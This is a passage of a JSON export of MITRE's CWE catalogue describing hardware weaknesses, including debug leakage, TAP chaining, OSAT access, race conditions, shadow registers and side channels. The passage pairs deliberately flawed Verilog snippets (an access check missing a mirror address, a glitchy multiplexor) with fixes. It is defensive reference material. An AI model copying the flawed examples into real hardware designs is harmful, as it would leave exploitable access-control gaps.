the internal state of the system. For example, debug data in design can be exposed through internal memory array dumps or boot logs through interfaces like UART via TAP commands, scan chain, etc. Thus, the more information contained in a debug message, the easier it is to debug. However, there is also the risk of revealing information that could help an attacker either decipher a vulnerability, and/or gain a better understanding of the system. Thus, this extra information could lower the \u201csecurity by obscurity\u201d factor. While \u201csecurity by obscurity\u201d alone is insufficient, it can help as a part of \u201cDefense-in-depth\u201d."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"209","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":["Read Memory","Bypass Protection Mechanism","Gain Privileges or Assume Identity","Varies by Context"],"Likelihood":"Medium"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that a debug message does not reveal any unnecessary information during the debug process for the intended response."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example here shows how an attacker can take advantage of unnecessary information in debug messages.","Body_Text":["Example 1: Suppose in response to a Test Access Port (TAP) chaining request the debug message also reveals the current TAP hierarchy (the full topology) in addition to the success/failure message.","Example 2: In response to a password-filling request, the debug message, instead of a simple Granted/Denied response, prints an elaborate message, \u201cThe user-entered password does not match the actual password stored in &lt;directory name&gt;.\u201d","The result of the above examples is that the user is able to gather additional unauthorized information about the system from the debug messages.","The solution is to ensure that Debug messages do not reveal additional details."]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2017-18326","Description":"modem debug messages include cryptographic keys","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18326"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"121"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1112"}}},"Content_History":{"Submission":{"Submission_Name":"Parbati Kumar Manna, Hareesh Khattri, Arun Kanuparthi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-31"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns, Relationships"}}},"1296":{"attr":{"@_ID":"1296","@_Name":"Incorrect Chaining or Granularity of Debug Components","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s debug components contain incorrect chaining or granularity of debug components.","Extended_Description":{"xhtml:p":["For debugging and troubleshooting a chip, several hardware design elements are often implemented, including:","Logic errors during design or synthesis could misconfigure the interconnection of the debug components, which could allow unintended access permissions."],"xhtml:ul":{"xhtml:li":["Various Test Access Ports (TAPs) allow boundary scan commands to be executed.","For scanning the internal components of a chip, there are scan cells that allow the chip to be used as a \\"stimulus and response\\" mechanism.","Chipmakers might create custom methods to observe the internal components of their chips by placing various tracing hubs within their chip and creating hierarchical or interconnected structures among those hubs."]}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control","Authentication","Authorization","Availability","Accountability"],"Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism","Execute Unauthorized Code or Commands","Modify Memory","Modify Files or Directories"],"Likelihood":"Medium","Note":"Depending on the access to debug component(s) erroneously granted, an attacker could use the debug component to gain additional understanding about the system to further an attack and/or execute other commands. This could compromise any security property, including the ones listed above."}},"Detection_Methods":{"Detection_Method":[{"Method":"Architecture or Design Review","Description":"Appropriate Post-Si tests should be carried out at various authorization levels to ensure that debug components are properly chained and accessible only to users with appropriate credentials.","Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":"Appropriate Post-Si tests should be carried out at various authorization levels to ensure that debug components are properly chained and accessible only to users with appropriate credentials.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that debug components are properly chained and their granularity is maintained at different authentication levels."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example shows how an attacker can take advantage of incorrect chaining or missing granularity of debug components.","Body_Text":["In a System-on-Chip (SoC), the user might be able to access the SoC-level TAP with a certain level of authorization. However, this access should not also grant access to all of the internal TAPs (e.g., Core). Separately, if any of the internal TAPs is also stitched to the TAP chain when it should not be because of a logic error, then an attacker can access the internal TAPs as well and execute commands there.","As a related example, suppose there is a hierarchy of TAPs (TAP_A is connected to TAP_B and TAP_C, then TAP_B is connected to TAP_D and TAP_E, then TAP_C is connected to TAP_F and TAP_G, etc.).  Architecture mandates that the user have one set of credentials for just accessing TAP_A, another set of credentials for accessing TAP_B and TAP_C, etc. However, if, during implementation, the designer mistakenly implements a daisy-chained TAP where all the TAPs are connected in a single TAP chain without the hierarchical structure, the correct granularity of debug components is not implemented and the attacker can gain unauthorized access."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2017-18347","Description":"Incorrect access control in RDP Level 1 on STMicroelectronics STM32F0 series devices allows physically present attackers to extract the device\'s protected firmware via a special sequence of Serial Wire Debug (SWD) commands because there is a race condition between full initialization of the SWD interface and the setup of flash protection.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18347"},{"Reference":"CVE-2020-1791","Description":"There is an improper authorization vulnerability in several smartphones.  The system has a logic-judging error, and, under certain scenarios, a successful exploit could allow the attacker to switch to third desktop after a series of operations in ADB mode. (Vulnerability ID: HWPSIRT-2019-10114).","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1791"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-31"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1297":{"attr":{"@_ID":"1297","@_Name":"Unprotected Confidential Information on Device is Accessible by OSAT Vendors","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product does not adequately protect confidential information on the device from being accessed by Outsourced Semiconductor Assembly and Test (OSAT) vendors.","Extended_Description":{"xhtml:p":["In contrast to complete vertical integration of architecting, designing, manufacturing, assembling, and testing chips all within a single organization, an organization can choose to simply architect and design a chip before outsourcing the rest of the process to OSAT entities (e.g., external foundries and test houses). In the latter example, the device enters an OSAT facility in a much more vulnerable pre-production stage where many debug and test modes are accessible. Therefore, the chipmaker must place a certain level of trust with the OSAT. To counter this, the chipmaker often requires the OSAT partner to enter into restrictive non-disclosure agreements (NDAs). Nonetheless, OSAT vendors likely have many customers, which increases the risk of accidental sharing of information. There may also be a security vulnerability in the information technology (IT) system of the OSAT facility. Alternatively, a malicious insider at the OSAT facility may carry out an insider attack. Considering these factors, it behooves the chipmaker to minimize any confidential information in the device that may be accessible to the OSAT vendor.","Logic errors during design or synthesis could misconfigure the interconnection of the debug components, which could provide improper authorization to sensitive information."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control","Authentication","Authorization","Availability","Accountability","Non-Repudiation"],"Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism","Execute Unauthorized Code or Commands","Modify Memory","Modify Files or Directories"],"Likelihood":"Medium","Note":"The impact depends on the confidential information itself and who is inadvertently granted access. For example, if the confidential information is a key that can unlock all the parts of a generation, the impact could be severe."}},"Detection_Methods":{"Detection_Method":[{"Method":"Architecture or Design Review","Description":"Appropriate Post-Si tests should be carried out to ensure that residual confidential information is not left on parts leaving one facility for another facility.","Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":"Appropriate Post-Si tests should be carried out to ensure that residual confidential information is not left on parts leaving one facility for another facility.","Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:ul":{"xhtml:li":["\u2022\\tEnsure that when an OSAT vendor is allowed to access test interfaces necessary for preproduction and returned parts, the vendor only pulls the minimal information necessary. Also, architect the product in such a way that, when an \u201cunlock device\u201d request comes, it only unlocks that specific part and not all the parts for that product line.","\u2022\\tEnsure that the product\u2019s non-volatile memory (NVM) is scrubbed of all confidential information and secrets before handing it over to an OSAT.","\u2022\\tArrange to secure all communication between an OSAT facility and the chipmaker."]}},"Effectiveness":"Moderate"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example shows how an attacker can take advantage of a piece of confidential information that has not been protected from the OSAT.","Body_Text":["Suppose the preproduction device contains NVM (a storage medium that by definition/design can retain its data without power), and this NVM contains a key that can unlock all the parts for that generation.  An OSAT facility accidentally leaks the key.","Compromising a key that can unlock all the parts of a generation can be devastating to a chipmaker.","The likelihood of such a compromise can be reduced by ensuring all memories on the preproduction device are properly scrubbed."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1113"}},{"attr":{"@_External_Reference_ID":"REF-1114"}}]},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-29"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1298":{"attr":{"@_ID":"1298","@_Name":"Hardware Logic Contains Race Conditions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A race condition in the hardware logic results in undermining security guarantees of the system.","Extended_Description":{"xhtml:p":"A race condition in logic circuits typically occurs when a logic gate gets inputs from signals that have traversed different paths while originating from the same source. Such inputs to the gate can change at slightly different times in response to a change in the source signal. This results in a timing error or a glitch (temporary or permanent) that causes the output to change to an unwanted state before settling back to the desired state. If such timing errors occur in access control logic or finite state machines that are implemented in security sensitive flows, an attacker might exploit them to circumvent existing protections."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}}],"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Adopting design practices that encourage designers to recognize and eliminate race conditions, such as Karnaugh maps, could result in the decrease in occurrences of race conditions."},{"Phase":"Implementation","Description":"Logic redundancy can be implemented along security critical paths to prevent race conditions. To avoid metastability, it is a good practice in general to default to a secure state in which access is not given to untrusted agents."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The code below shows a 2x1 multiplexor using logic gates. Though the code shown below results in the minimum gate solution, it is disjoint and causes glitches.","Example_Code":[{"#text":"// 2x1 Multiplexor using logic-gatesmodule glitchEx();wire not_sel;wire and_out1, and_out2;assign not_sel = ~sel;assign and_out1 = not_sel &amp; in0;assign and_out2 = sel &amp; in1;// Buggy line of code:assign z = and_out1 | and_out2; // glitch in signal zendmodule","attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:div":{"#text":"input wire in0, in1, sel,output wire z","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}},{"#text":"assign z &lt;= and_out1 or and_out2 or (in0 and in1);","attr":{"@_Nature":"good","@_Language":"Verilog"}}],"Body_Text":["The buggy line of code, commented above, results in signal \'z\' periodically changing to an unwanted state. Thus, any logic that references signal \'z\' may access it at a time when it is in this unwanted state. This line should be replaced with the line shown below in the Good Code Snippet which results in signal \'z\' remaining in a continuous, known, state. Reference for the above code, along with waveforms for simulation can be found in the references below.","This line of code removes the glitch in signal z."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"26"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1115"}},{"attr":{"@_External_Reference_ID":"REF-1116"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-10"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1299":{"attr":{"@_ID":"1299","@_Name":"Missing Protection Mechanism for Alternate Hardware Interface","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The lack of protections on alternate paths to access\\n                control-protected assets (such as unprotected shadow registers\\n                and other external facing unguarded interfaces) allows an\\n                attacker to bypass existing protections to the asset that are\\n\\t\\tonly performed against the primary path.","Extended_Description":{"xhtml:p":["An asset inside a chip might have access-control\\n                    protections through one interface. However, if all paths to\\n                    the asset are not protected, an attacker might compromise\\n                    the asset through alternate paths. These alternate paths\\n                    could be through shadow or mirror registers inside the IP\\n                    core, or could be paths from other external-facing\\n                    interfaces to the IP core or SoC.","Consider an SoC with various interfaces such as UART,\\n                    SMBUS, PCIe, USB, etc. If access control is implemented for\\n                    SoC internal registers only over the PCIe interface, then\\n                    an attacker could still modify the SoC internal registers\\n                    through alternate paths by coming through interfaces such\\n                    as UART, SMBUS, USB, etc.","Alternatively, attackers might be able to bypass\\n                    existing protections by exploiting unprotected, shadow\\n                    registers. Shadow registers and mirror registers typically\\n                    refer to registers that can be accessed from multiple\\n                    addresses. Writing to or reading from the aliased/mirrored\\n                    address has the same effect as writing to the address of\\n                    the main register. They are typically implemented within an\\n                    IP core or SoC to temporarily hold certain data. These data\\n                    will later be updated to the main register, and both\\n                    registers will be in synch. If the shadow registers are not\\n                    access-protected, attackers could simply initiate\\n                    transactions to the shadow registers and compromise system\\n                    security."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1191","@_View_ID":"1194","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"420","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"288","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Microcontroller IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Bus/Interface IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","DoS: Resource Consumption (Other)","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Quality Degradation"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Protect assets from accesses against all potential interfaces and alternate paths.","Effectiveness":"Defense in Depth"},{"Phase":"Architecture and Design","Description":"Protect assets from accesses against all potential interfaces and alternate paths.","Effectiveness":"Defense in Depth"},{"Phase":"Implementation","Description":"Protect assets from accesses against all potential interfaces and alternate paths.","Effectiveness":"Defense in Depth"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Register SECURE_ME is located at address 0xF00. A\\n                            mirror of this register called COPY_OF_SECURE_ME is\\n                            at location 0x800F00. The register SECURE_ME is\\n                            protected from malicious agents and only allows\\n                            access to select, while COPY_OF_SECURE_ME is not.","Access control is implemented using an allowlist (as\\n                            indicated by acl_oh_allowlist). The identity of the\\n                            initiator of the transaction is indicated by the\\n                            one hot input, incoming_id. This is checked against\\n                            the acl_oh_allowlist (which contains a list of\\n                            initiators that are allowed to access the asset).","Though this example is shown in Verilog, it will\\n                            apply to VHDL as well."]},"Example_Code":[{"#text":"module foo_bar(data_out, data_in, incoming_id, address, clk, rst_n);output [31:0] data_out;input [31:0] data_in, incoming_id, address;input clk, rst_n;wire write_auth, addr_auth;reg [31:0] data_out, acl_oh_allowlist, q;assign write_auth = | (incoming_id &amp; acl_oh_allowlist) ? 1 : 0;always @*assign addr_auth = (address == 32\u2019hF00) ? 1: 0;always @ (posedge clk or negedge rst_n)endmodule","attr":{"@_Nature":"informative","@_Language":"Verilog"},"xhtml:br":["","","","","","","","","","",""],"xhtml:div":[{"#text":"acl_oh_allowlist &lt;= 32\u2019h8312;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"if (!rst_n)elseend","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"beginend","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"q &lt;= 32\u2019h0;data_out &lt;= 32\u2019h0;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}},{"#text":"beginend","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"q &lt;= (addr_auth &amp; write_auth) ? data_in: q;data_out &lt;= q;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}]}]},{"#text":"assign addr_auth = (address == 32\u2019hF00) ? 1: 0;","attr":{"@_Nature":"bad","@_Language":"Verilog"}},{"#text":"assign addr_auth = (address == 32\u2019hF00 || address == 32\u2019h800F00) ? 1: 0;","attr":{"@_Nature":"good","@_Language":"Verilog"}}],"Body_Text":"The bugged line of code is repeated in the Bad\\n                        example above. Weakness arises from the fact that the\\n                        SECURE_ME register can be modified by writing to the\\n                        shadow register COPY_OF_SECURE_ME, the address of\\n                        COPY_OF_SECURE_ME should also be included in the check.\\n                        That buggy line of code should instead be replaced as\\n                        shown in the Good Code Snippet below."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2017-18293","Description":"When GPIO is protected by blocking access\\n                        to corresponding GPIO resource registers,\\n                        protection can be bypassed by writing to the\\n                        corresponding banked GPIO registers instead.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18293"},{"Reference":"CVE-2020-15483","Description":"monitor device allows access to physical UART debug port without authentication","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15483"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}},{"attr":{"@_CAPEC_ID":"554"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-10-02"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns"}]}},"1300":{"attr":{"@_ID":"1300","@_Name":"Improper Protection of Physical Side Channels","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The device does not contain sufficient protection\\n\\tmechanisms to prevent physical side channels from exposing\\n\\tsensitive information due to patterns in physically observable\\n\\tphenomena such as variations in power consumption,\\n\\telectromagnetic emissions (EME), or acoustic emissions.","Extended_Description":{"xhtml:p":["An adversary could monitor and measure physical\\n\\t  phenomena to detect patterns and make inferences, even if it\\n\\t  is not possible to extract the information in the digital\\n\\t  domain.","Physical side channels have been well-studied for\\n\\t  decades in the context of breaking implementations of\\n\\t  cryptographic algorithms or other attacks against security\\n\\t  features. These side channels may be easily observed by an\\n\\t  adversary with physical access to the device, or using a\\n\\t  tool that is in close proximity.  If the adversary can\\n\\t  monitor hardware operation and correlate its data processing\\n\\t  with power, EME, and acoustic measurements, the adversary\\n\\t  might be able to recover of secret keys and data."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"203","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"203","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"Perform a set of leakage detection tests such as the procedure outlined in the Test Vector Leakage Assessment (TVLA) test requirements for AES [REF-1230].  TVLA is the basis for the ISO standard 17825 [REF-1229]. A separate methodology is provided by [REF-1228]. Note that sole reliance on this method might not yield expected results [REF-1239] [REF-1240].","Effectiveness":"Moderate"},{"Method":"Manual Analysis","Description":{"xhtml:p":"Post-silicon, perform full side-channel attacks (penetration testing) covering as many known leakage models as possible against test code."},"Effectiveness":"Moderate"},{"Method":"Manual Analysis","Description":{"xhtml:p":"Pre-silicon - while the aforementioned TVLA methods can be performed post-silicon, models of device power consumption or other physical emanations can be built from information present at various stages of the hardware design process before fabrication. TVLA or known side-channel attacks can be applied to these simulated traces and countermeasures applied before tape-out.  Academic research in this field includes [REF-1231] [REF-1232] [REF-1233]."},"Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Apply blinding or masking techniques to implementations of cryptographic algorithms."},{"Phase":"Implementation","Description":"Add shielding or tamper-resistant protections to the device to increase the difficulty of obtaining measurements of the side-channel."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Consider a device that checks a\\n\\t\\t    passcode to unlock the screen.","Example_Code":[{"#text":"As each character of\\n\\t\\t    the PIN number is entered, a correct character\\n\\t\\t    exhibits one current pulse shape while an\\n\\t\\t    incorrect character exhibits a different current\\n\\t\\t    pulse shape.","attr":{"@_Nature":"bad"}},{"#text":"Rather than comparing\\n\\t\\t    each character to the correct PIN value as it is\\n\\t\\t    entered, the device could accumulate the PIN in a\\n\\t\\t    register, and do the comparison all at once at the\\n\\t\\t    end. Alternatively, the components for the\\n\\t\\t    comparison could be modified so that the current\\n\\t\\t    pulse shape is the same regardless of the\\n\\t\\t    correctness of the entered\\n\\t\\t    character.","attr":{"@_Nature":"good"}}],"Body_Text":"PIN numbers used to unlock a cell phone\\n\\t\\t    should not exhibit any characteristics about\\n\\t\\t    themselves. This creates a side channel. An\\n\\t\\t    attacker could monitor the pulses using an\\n\\t\\t    oscilloscope or other method. Once the first\\n\\t\\t    character is correctly guessed (based on the\\n\\t\\t    oscilloscope readings), they can then move to the\\n\\t\\t    next character, which is much more efficient than\\n\\t\\t    the brute force method of guessing every possible\\n\\t\\t    sequence of characters."},{"Intro_Text":"Consider the device vulnerability CVE-2021-3011, which affects certain microcontrollers [REF-1221]. The Google Titan Security Key is used for two-factor authentication using cryptographic algorithms. The device uses an internal secret key for this purpose and exchanges information based on this key for the authentication. If this internal secret key and the encryption algorithm were known to an adversary, the key function could be duplicated, allowing the adversary to masquerade as the legitimate user.","Example_Code":[{"#text":"The local method of extracting the secret key consists of plugging the key into a USB port and using electromagnetic (EM) sniffing tools and computers.","attr":{"@_Nature":"bad"}},{"#text":"Several solutions could have been considered by the manufacturer. For example, the manufacturer could shield the circuitry in the key or add randomized delays, indirect calculations with random values involved, or randomly ordered calculations to make extraction much more difficult or a combination of these techniques.","attr":{"@_Nature":"good"}}]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2021-3011","Description":"electromagnetic-wave side-channel in security-related microcontrollers allows extraction of private key","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3011"},{"Reference":"CVE-2013-4576","Description":"message encryption software uses certain instruction sequences that allows RSA key extraction using a chosen-ciphertext attack and acoustic cryptanalysis","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4576"},{"Reference":"CVE-2020-28368","Description":"virtualization product allows recovery of AES keys from the guest OS using a side channel attack against a power/energy monitoring interface.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28368"},{"Reference":"CVE-2019-18673","Description":"power consumption varies based on number of pixels being illuminated in a display, allowing reading of secrets such as the PIN by using the USB interface to measure power consumption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18673"}]},"Functional_Areas":{"Functional_Area":"Power"},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"189"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1117"}},{"attr":{"@_External_Reference_ID":"REF-1118"}},{"attr":{"@_External_Reference_ID":"REF-1119"}},{"attr":{"@_External_Reference_ID":"REF-1120"}},{"attr":{"@_External_Reference_ID":"REF-1055"}},{"attr":{"@_External_Reference_ID":"REF-1218"}},{"attr":{"@_External_Reference_ID":"REF-1221"}},{"attr":{"@_External_Reference_ID":"REF-1228"}},{"attr":{"@_External_Reference_ID":"REF-1229"}},{"attr":{"@_External_Reference_ID":"REF-1230"}},{"attr":{"@_External_Reference_ID":"REF-1231","@_Section":"pp. 305-319"}},{"attr":{"@_External_Reference_ID":"REF-1232","@_Section":"pp. 123-130"}},{"attr":{"@_External_Reference_ID":"REF-1233"}},{"attr":{"@_External_Reference_ID":"REF-1234"}},{"attr":{"@_External_Reference_ID":"REF-1235"}},{"attr":{"@_External_Reference_ID":"REF-1239"}},{"attr":{"@_External_Reference_ID":"REF-1240"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-29"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Functional_Areas, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Contribution":[{"attr":{"@_Type":"Content"},"Contribution_Name":"Anders Nordstrom, Alric Althoff","Contribution_Organization":"Tortuga Logic","Contribution_Date":"2021-10-11","Contribution_Comment":"Provided detection methods, observed examples, and 